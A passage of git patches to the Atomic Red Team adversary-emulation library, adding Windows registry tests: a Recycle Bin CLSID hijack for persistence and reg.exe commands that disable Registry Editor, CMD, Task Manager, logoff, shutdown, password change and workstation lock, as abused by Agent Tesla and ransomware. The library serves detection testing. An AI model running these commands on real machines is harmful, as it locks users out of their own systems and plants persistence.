+Add a persistance via Recycle bin [vxunderground](https://github.com/vxunderground/VXUG-Papers/blob/main/The%20Persistence%20Series/Persistence%20via%20Recycle%20Bin/Persistence_via_Recycle_Bin.pdf)
+User have to clic on the recycle bin to lauch the payload (here calc)
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** bda6a3d6-7aa7-4e89-908b-306772e9662f
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+reg ADD "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open\command" /ve /d "calc.exe" /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg DELETE "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open" /f
+```
+
+
+
+
+
 <br/>

From 7a4e2abcdb4433ce8756e4181361d533e5955d49 Mon Sep 17 00:00:00 2001
From: tccontre <26181693+tccontre@users.noreply.github.com>
Date: Mon, 14 Mar 2022 18:44:14 +0100
Subject: [PATCH 38/83] Update T1112.yaml (#1810)

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
---
 atomics/T1112/T1112.yaml | 42 ++++++++++++++++++++++++++++++++++++++++
 1 file changed, 42 insertions(+)

diff --git a/atomics/T1112/T1112.yaml b/atomics/T1112/T1112.yaml
index 22f0acff..d34ab9ba 100644
--- a/atomics/T1112/T1112.yaml
+++ b/atomics/T1112/T1112.yaml
@@ -156,3 +156,45 @@ atomic_tests:
       Remove-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem" -Name LongPathsEnabled -Force -ErrorAction Ignore
     name: powershell
     elevation_required: true
+- name: Disable Windows Registry Tool
+  auto_generated_guid: ac34b0f7-0f85-4ac0-b93e-3ced2bc69bb8
+  description: |
+    Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows registry tool to prevent user modifying registry entry.
+    See example how Agent Tesla malware abuse this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\policies\system /v DisableRegistryTools /t REG_DWORD /d 1 /f
+    cleanup_command: |
+      reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\policies\system /v DisableRegistryTools /f >nul 2>&1
+    name: command_prompt
+    elevation_required: true
+- name: Disable Windows CMD application
+  auto_generated_guid: d2561a6d-72bd-408c-b150-13efe1801c2a
+  description: |
+    Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows CMD application.
+    See example how Agent Tesla malware abuse this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System" /v "DisableCMD" /t REG_DWORD /d "1" /f
+    cleanup_command: |
+      reg delete "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System" /v "DisableCMD" /f >nul 2>&1
+    name: command_prompt
+    elevation_required: true
+- name: Disable Windows Task Manager application
+  auto_generated_guid: af254e70-dd0e-4de6-9afe-a994d9ea8b62
+  description: |
+    Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows task manager application.
+    See example how Agent Tesla malware abuse this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskmgr /t REG_DWORD /d 1 /f
+    cleanup_command: |
+      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskmgr /f >nul 2>&1
+    name: command_prompt
+    elevation_required: true

From 859404904aa1047437e15b53a3628d7d7532d593 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team GUID generator <email>
Date: Mon, 14 Mar 2022 17:44:50 +0000
Subject: [PATCH 39/83] Generate GUIDs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/used_guids.txt | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index 6c869322..812dfa72 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -900,3 +900,6 @@ e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad
 b2698b33-984c-4a1c-93bb-e4ba72a0babb
 cb01b3da-b0e7-4e24-bf6d-de5223526785
 bda6a3d6-7aa7-4e89-908b-306772e9662f
+ac34b0f7-0f85-4ac0-b93e-3ced2bc69bb8
+d2561a6d-72bd-408c-b150-13efe1801c2a
+af254e70-dd0e-4de6-9afe-a994d9ea8b62

From de8ceae8a639b78e5cf4dc8af3ec08dadf55e3b2 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator <email>
Date: Mon, 14 Mar 2022 17:44:57 +0000
Subject: [PATCH 40/83] Generate docs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/Indexes/Indexes-CSV/index.csv         |   3 +
 atomics/Indexes/Indexes-CSV/windows-index.csv |   3 +
 atomics/Indexes/Indexes-Markdown/index.md     |   3 +
 .../Indexes/Indexes-Markdown/windows-index.md |   3 +
 atomics/Indexes/index.yaml                    |  54 +++++++++
 atomics/T1112/T1112.md                        | 105 ++++++++++++++++++
 6 files changed, 171 insertions(+)

diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 385e6757..ce20a74d 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -479,6 +479,9 @@ defense-evasion,T1112,Modify Registry,5,Javascript in registry,15f44ea9-4571-483
 defense-evasion,T1112,Modify Registry,6,Change Powershell Execution Policy to Bypass,f3a6cceb-06c9-48e5-8df8-8867a6814245,powershell
 defense-evasion,T1112,Modify Registry,7,BlackByte Ransomware Registry Changes - CMD,4f4e2f9f-6209-4fcf-9b15-3b7455706f5b,command_prompt
 defense-evasion,T1112,Modify Registry,8,BlackByte Ransomware Registry Changes - Powershell,0b79c06f-c788-44a2-8630-d69051f1123d,powershell
+defense-evasion,T1112,Modify Registry,9,Disable Windows Registry Tool,ac34b0f7-0f85-4ac0-b93e-3ced2bc69bb8,command_prompt
+defense-evasion,T1112,Modify Registry,10,Disable Windows CMD application,d2561a6d-72bd-408c-b150-13efe1801c2a,command_prompt
+defense-evasion,T1112,Modify Registry,11,Disable Windows Task Manager application,af254e70-dd0e-4de6-9afe-a994d9ea8b62,command_prompt
 defense-evasion,T1218.005,Mshta,1,Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject,1483fab9-4f52-4217-a9ce-daa9d7747cae,command_prompt
 defense-evasion,T1218.005,Mshta,2,Mshta executes VBScript to execute malicious command,906865c3-e05f-4acc-85c4-fbc185455095,command_prompt
 defense-evasion,T1218.005,Mshta,3,Mshta Executes Remote HTML Application (HTA),c4b97eeb-5249-4455-a607-59f95485cb45,powershell
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index d1c3e403..659b4ea5 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -310,6 +310,9 @@ defense-evasion,T1112,Modify Registry,5,Javascript in registry,15f44ea9-4571-483
 defense-evasion,T1112,Modify Registry,6,Change Powershell Execution Policy to Bypass,f3a6cceb-06c9-48e5-8df8-8867a6814245,powershell
 defense-evasion,T1112,Modify Registry,7,BlackByte Ransomware Registry Changes - CMD,4f4e2f9f-6209-4fcf-9b15-3b7455706f5b,command_prompt
 defense-evasion,T1112,Modify Registry,8,BlackByte Ransomware Registry Changes - Powershell,0b79c06f-c788-44a2-8630-d69051f1123d,powershell
+defense-evasion,T1112,Modify Registry,9,Disable Windows Registry Tool,ac34b0f7-0f85-4ac0-b93e-3ced2bc69bb8,command_prompt
+defense-evasion,T1112,Modify Registry,10,Disable Windows CMD application,d2561a6d-72bd-408c-b150-13efe1801c2a,command_prompt
+defense-evasion,T1112,Modify Registry,11,Disable Windows Task Manager application,af254e70-dd0e-4de6-9afe-a994d9ea8b62,command_prompt
 defense-evasion,T1218.005,Mshta,1,Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject,1483fab9-4f52-4217-a9ce-daa9d7747cae,command_prompt
 defense-evasion,T1218.005,Mshta,2,Mshta executes VBScript to execute malicious command,906865c3-e05f-4acc-85c4-fbc185455095,command_prompt
 defense-evasion,T1218.005,Mshta,3,Mshta Executes Remote HTML Application (HTA),c4b97eeb-5249-4455-a607-59f95485cb45,powershell
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 01541682..6a8d8e45 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -754,6 +754,9 @@
   - Atomic Test #6: Change Powershell Execution Policy to Bypass [windows]
   - Atomic Test #7: BlackByte Ransomware Registry Changes - CMD [windows]
   - Atomic Test #8: BlackByte Ransomware Registry Changes - Powershell [windows]
+  - Atomic Test #9: Disable Windows Registry Tool [windows]
+  - Atomic Test #10: Disable Windows CMD application [windows]
+  - Atomic Test #11: Disable Windows Task Manager application [windows]
 - T1601 Modify System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1218.005 Mshta](../../T1218.005/T1218.005.md)
   - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index af36968d..79be6688 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -522,6 +522,9 @@
   - Atomic Test #6: Change Powershell Execution Policy to Bypass [windows]
   - Atomic Test #7: BlackByte Ransomware Registry Changes - CMD [windows]
   - Atomic Test #8: BlackByte Ransomware Registry Changes - Powershell [windows]
+  - Atomic Test #9: Disable Windows Registry Tool [windows]
+  - Atomic Test #10: Disable Windows CMD application [windows]
+  - Atomic Test #11: Disable Windows Task Manager application [windows]
 - [T1218.005 Mshta](../../T1218.005/T1218.005.md)
   - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
   - Atomic Test #2: Mshta executes VBScript to execute malicious command [windows]
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index fc48a68d..cd75cde6 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -31727,6 +31727,60 @@ defense-evasion:
           Remove-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem" -Name LongPathsEnabled -Force -ErrorAction Ignore
         name: powershell
         elevation_required: true
+    - name: Disable Windows Registry Tool
+      auto_generated_guid: ac34b0f7-0f85-4ac0-b93e-3ced2bc69bb8
+      description: |
+        Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows registry tool to prevent user modifying registry entry.
+        See example how Agent Tesla malware abuse this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\policies\system
+          /v DisableRegistryTools /t REG_DWORD /d 1 /f
+
+'
+        cleanup_command: 'reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\policies\system
+          /v DisableRegistryTools /f >nul 2>&1
+
+'
+        name: command_prompt
+        elevation_required: true
+    - name: Disable Windows CMD application
+      auto_generated_guid: d2561a6d-72bd-408c-b150-13efe1801c2a
+      description: |
+        Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows CMD application.
+        See example how Agent Tesla malware abuse this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System"
+          /v "DisableCMD" /t REG_DWORD /d "1" /f
+
+'
+        cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System"
+          /v "DisableCMD" /f >nul 2>&1
+
+'
+        name: command_prompt
+        elevation_required: true
+    - name: Disable Windows Task Manager application
+      auto_generated_guid: af254e70-dd0e-4de6-9afe-a994d9ea8b62
+      description: |
+        Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows task manager application.
+        See example how Agent Tesla malware abuse this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System"
+          /v DisableTaskmgr /t REG_DWORD /d 1 /f
+
+'
+        cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System"
+          /v DisableTaskmgr /f >nul 2>&1
+
+'
+        name: command_prompt
+        elevation_required: true
   T1601:
     technique:
       external_references:
diff --git a/atomics/T1112/T1112.md b/atomics/T1112/T1112.md
index 7c1dfe05..aed60f59 100644
--- a/atomics/T1112/T1112.md
+++ b/atomics/T1112/T1112.md
@@ -26,6 +26,12 @@ The Registry of a remote system may be modified to aid in execution of files as
 
 - [Atomic Test #8 - BlackByte Ransomware Registry Changes - Powershell](#atomic-test-8---blackbyte-ransomware-registry-changes---powershell)
 
+- [Atomic Test #9 - Disable Windows Registry Tool](#atomic-test-9---disable-windows-registry-tool)
+
+- [Atomic Test #10 - Disable Windows CMD application](#atomic-test-10---disable-windows-cmd-application)
+
+- [Atomic Test #11 - Disable Windows Task Manager application](#atomic-test-11---disable-windows-task-manager-application)
+
 
 <br/>
 
@@ -336,4 +342,103 @@ Remove-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem" -Name Lo
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #9 - Disable Windows Registry Tool
+Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows registry tool to prevent user modifying registry entry.
+See example how Agent Tesla malware abuse this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** ac34b0f7-0f85-4ac0-b93e-3ced2bc69bb8
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\policies\system /v DisableRegistryTools /t REG_DWORD /d 1 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\policies\system /v DisableRegistryTools /f >nul 2>&1
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #10 - Disable Windows CMD application
+Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows CMD application.
+See example how Agent Tesla malware abuse this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** d2561a6d-72bd-408c-b150-13efe1801c2a
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System" /v "DisableCMD" /t REG_DWORD /d "1" /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System" /v "DisableCMD" /f >nul 2>&1
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #11 - Disable Windows Task Manager application
+Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows task manager application.
+See example how Agent Tesla malware abuse this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** af254e70-dd0e-4de6-9afe-a994d9ea8b62
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskmgr /t REG_DWORD /d 1 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskmgr /f >nul 2>&1
+```
+
+
+
+
+
 <br/>

From d83aada89334f5235655aa1279d6c134548e597b Mon Sep 17 00:00:00 2001
From: tccontre <26181693+tccontre@users.noreply.github.com>
Date: Mon, 14 Mar 2022 19:00:25 +0100
Subject: [PATCH 41/83] Disable Windows Features (#1811)

* Update T1112.yaml

* Update T1112.yaml

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
---
 atomics/T1112/T1112.yaml | 72 ++++++++++++++++++++++++++++++++++++++++
 1 file changed, 72 insertions(+)

diff --git a/atomics/T1112/T1112.yaml b/atomics/T1112/T1112.yaml
index d34ab9ba..997b2a40 100644
--- a/atomics/T1112/T1112.yaml
+++ b/atomics/T1112/T1112.yaml
@@ -198,3 +198,75 @@ atomic_tests:
       reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskmgr /f >nul 2>&1
     name: command_prompt
     elevation_required: true
+- name: Disable Windows Notification Center
+  auto_generated_guid: c0d6d67f-1f63-42cc-95c0-5fd6b20082ad
+  description: |
+    Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows notification center.
+    See how remcos rat abuse this technique- https://tccontre.blogspot.com/2020/01/remcos-rat-evading-windows-defender-av.html
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Explorer /v DisableNotificationCenter /t REG_DWORD /d 1 /f
+    cleanup_command: |
+      reg delete HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Explorer /v DisableNotificationCenter /f >nul 2>&1
+    name: command_prompt
+    elevation_required: true
+- name: Disable Windows Shutdown Button
+  auto_generated_guid: 6e0d1131-2d7e-4905-8ca5-d6172f05d03d
+  description: |
+    Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows shutdown button.
+    See how ransomware abuse this technique- https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/ransom.msil.screenlocker.a/
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v shutdownwithoutlogon /t REG_DWORD /d 0 /f
+    cleanup_command: |
+      reg delete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v shutdownwithoutlogon /f >nul 2>&1
+    name: command_prompt
+    elevation_required: true
+- name: Disable Windows LogOff Button 
+  auto_generated_guid: e246578a-c24d-46a7-9237-0213ff86fb0c
+  description: |
+    Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows logoff button.
+    See how ransomware abuse this technique- https://www.trendmicro.com/vinfo/be/threat-encyclopedia/search/js_noclose.e/2
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoLogOff /t REG_DWORD /d 1 /f
+      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v StartMenuLogOff /t REG_DWORD /d 1 /f
+    cleanup_command: |
+      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoLogOff /f >nul 2>&1
+      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v StartMenuLogOff /f >nul 2>&1
+    name: command_prompt
+    elevation_required: true
+- name: Disable Windows Change Password Feature
+  auto_generated_guid: d4a6da40-618f-454d-9a9e-26af552aaeb0
+  description: |
+    Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows change password feature.
+    See how ransomware abuse this technique- https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/ransom_heartbleed.thdobah
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableChangePassword /t REG_DWORD /d 1 /f
+    cleanup_command: |
+      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableChangePassword /f >nul 2>&1
+    name: command_prompt
+    elevation_required: true
+- name: Disable Windows Lock Workstation Feature
+  auto_generated_guid: 3dacb0d2-46ee-4c27-ac1b-f9886bf91a56
+  description: |
+    Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows Lock workstation feature.
+    See how ransomware abuse this technique- https://www.bleepingcomputer.com/news/security/in-dev-ransomware-forces-you-do-to-survey-before-unlocking-computer/
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableLockWorkstation /t REG_DWORD /d 1 /f
+    cleanup_command: |
+      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableLockWorkstation /f >nul 2>&1
+    name: command_prompt
+    elevation_required: true
\ No newline at end of file

From e0a6429a77b574e62771318fbed5085457fcb68d Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team GUID generator <email>
Date: Mon, 14 Mar 2022 18:01:07 +0000
Subject: [PATCH 42/83] Generate GUIDs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/used_guids.txt | 5 +++++
 1 file changed, 5 insertions(+)

diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index 812dfa72..abb3c088 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -903,3 +903,8 @@ bda6a3d6-7aa7-4e89-908b-306772e9662f
 ac34b0f7-0f85-4ac0-b93e-3ced2bc69bb8
 d2561a6d-72bd-408c-b150-13efe1801c2a
 af254e70-dd0e-4de6-9afe-a994d9ea8b62
+c0d6d67f-1f63-42cc-95c0-5fd6b20082ad
+6e0d1131-2d7e-4905-8ca5-d6172f05d03d
+e246578a-c24d-46a7-9237-0213ff86fb0c
+d4a6da40-618f-454d-9a9e-26af552aaeb0
+3dacb0d2-46ee-4c27-ac1b-f9886bf91a56

From 052cae4391b32d3b99793d3f2d38de5fd0f47e3e Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator <email>
Date: Mon, 14 Mar 2022 18:01:13 +0000
Subject: [PATCH 43/83] Generate docs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/Indexes/Indexes-CSV/index.csv         |   5 +
 atomics/Indexes/Indexes-CSV/windows-index.csv |   5 +
 atomics/Indexes/Indexes-Markdown/index.md     |   5 +
 .../Indexes/Indexes-Markdown/windows-index.md |   5 +
 atomics/Indexes/index.yaml                    |  88 +++++++++
 atomics/T1112/T1112.md                        | 177 ++++++++++++++++++
 6 files changed, 285 insertions(+)

diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index ce20a74d..4dbe8fde 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -482,6 +482,11 @@ defense-evasion,T1112,Modify Registry,8,BlackByte Ransomware Registry Changes -
 defense-evasion,T1112,Modify Registry,9,Disable Windows Registry Tool,ac34b0f7-0f85-4ac0-b93e-3ced2bc69bb8,command_prompt
 defense-evasion,T1112,Modify Registry,10,Disable Windows CMD application,d2561a6d-72bd-408c-b150-13efe1801c2a,command_prompt
 defense-evasion,T1112,Modify Registry,11,Disable Windows Task Manager application,af254e70-dd0e-4de6-9afe-a994d9ea8b62,command_prompt
+defense-evasion,T1112,Modify Registry,12,Disable Windows Notification Center,c0d6d67f-1f63-42cc-95c0-5fd6b20082ad,command_prompt
+defense-evasion,T1112,Modify Registry,13,Disable Windows Shutdown Button,6e0d1131-2d7e-4905-8ca5-d6172f05d03d,command_prompt
+defense-evasion,T1112,Modify Registry,14,Disable Windows LogOff Button,e246578a-c24d-46a7-9237-0213ff86fb0c,command_prompt
+defense-evasion,T1112,Modify Registry,15,Disable Windows Change Password Feature,d4a6da40-618f-454d-9a9e-26af552aaeb0,command_prompt
+defense-evasion,T1112,Modify Registry,16,Disable Windows Lock Workstation Feature,3dacb0d2-46ee-4c27-ac1b-f9886bf91a56,command_prompt
 defense-evasion,T1218.005,Mshta,1,Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject,1483fab9-4f52-4217-a9ce-daa9d7747cae,command_prompt
 defense-evasion,T1218.005,Mshta,2,Mshta executes VBScript to execute malicious command,906865c3-e05f-4acc-85c4-fbc185455095,command_prompt
 defense-evasion,T1218.005,Mshta,3,Mshta Executes Remote HTML Application (HTA),c4b97eeb-5249-4455-a607-59f95485cb45,powershell
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 659b4ea5..5b5eadf1 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -313,6 +313,11 @@ defense-evasion,T1112,Modify Registry,8,BlackByte Ransomware Registry Changes -
 defense-evasion,T1112,Modify Registry,9,Disable Windows Registry Tool,ac34b0f7-0f85-4ac0-b93e-3ced2bc69bb8,command_prompt
 defense-evasion,T1112,Modify Registry,10,Disable Windows CMD application,d2561a6d-72bd-408c-b150-13efe1801c2a,command_prompt
 defense-evasion,T1112,Modify Registry,11,Disable Windows Task Manager application,af254e70-dd0e-4de6-9afe-a994d9ea8b62,command_prompt
+defense-evasion,T1112,Modify Registry,12,Disable Windows Notification Center,c0d6d67f-1f63-42cc-95c0-5fd6b20082ad,command_prompt
+defense-evasion,T1112,Modify Registry,13,Disable Windows Shutdown Button,6e0d1131-2d7e-4905-8ca5-d6172f05d03d,command_prompt
+defense-evasion,T1112,Modify Registry,14,Disable Windows LogOff Button,e246578a-c24d-46a7-9237-0213ff86fb0c,command_prompt
+defense-evasion,T1112,Modify Registry,15,Disable Windows Change Password Feature,d4a6da40-618f-454d-9a9e-26af552aaeb0,command_prompt
+defense-evasion,T1112,Modify Registry,16,Disable Windows Lock Workstation Feature,3dacb0d2-46ee-4c27-ac1b-f9886bf91a56,command_prompt
 defense-evasion,T1218.005,Mshta,1,Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject,1483fab9-4f52-4217-a9ce-daa9d7747cae,command_prompt
 defense-evasion,T1218.005,Mshta,2,Mshta executes VBScript to execute malicious command,906865c3-e05f-4acc-85c4-fbc185455095,command_prompt
 defense-evasion,T1218.005,Mshta,3,Mshta Executes Remote HTML Application (HTA),c4b97eeb-5249-4455-a607-59f95485cb45,powershell
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 6a8d8e45..f94c7bc5 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -757,6 +757,11 @@
   - Atomic Test #9: Disable Windows Registry Tool [windows]
   - Atomic Test #10: Disable Windows CMD application [windows]
   - Atomic Test #11: Disable Windows Task Manager application [windows]
+  - Atomic Test #12: Disable Windows Notification Center [windows]
+  - Atomic Test #13: Disable Windows Shutdown Button [windows]
+  - Atomic Test #14: Disable Windows LogOff Button [windows]
+  - Atomic Test #15: Disable Windows Change Password Feature [windows]
+  - Atomic Test #16: Disable Windows Lock Workstation Feature [windows]
 - T1601 Modify System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1218.005 Mshta](../../T1218.005/T1218.005.md)
   - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index 79be6688..b500a3c2 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -525,6 +525,11 @@
   - Atomic Test #9: Disable Windows Registry Tool [windows]
   - Atomic Test #10: Disable Windows CMD application [windows]
   - Atomic Test #11: Disable Windows Task Manager application [windows]
+  - Atomic Test #12: Disable Windows Notification Center [windows]
+  - Atomic Test #13: Disable Windows Shutdown Button [windows]
+  - Atomic Test #14: Disable Windows LogOff Button [windows]
+  - Atomic Test #15: Disable Windows Change Password Feature [windows]
+  - Atomic Test #16: Disable Windows Lock Workstation Feature [windows]
 - [T1218.005 Mshta](../../T1218.005/T1218.005.md)
